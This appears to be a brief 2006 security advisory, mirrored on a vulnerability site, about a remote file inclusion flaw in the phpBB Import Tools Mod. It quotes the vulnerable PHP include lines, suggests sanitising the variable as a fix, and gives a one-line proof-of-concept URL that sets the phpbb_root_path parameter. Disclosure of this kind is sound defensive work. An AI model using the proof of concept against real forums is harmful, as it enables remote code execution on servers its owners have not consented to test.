# # * # * Title: phpBB Import Tools Mod <= 0.1.4 (phpbb_root_path) Remote File Inclusion # * Author/Discovery: boecke # * Vulnerability Type: Remote File Inclusion # * Risk: High Risk # * Software Affected: phpBB Import Tools Mod <= 0.1.4 # * # * Literally shouts to: str0ke and henrik # * Don't promote Google-ism! # * # [ Vulnerable Code: ] include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx); include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx); include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx); [ Fix: ] Correctly sanitize these variables before their use or deny direct access to the script. [ Proof of Concept: ] http://localhost/phpBB2/includes/functions_mod_user.php?phpbb_root_path= # milw0rm.com [2006-10-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论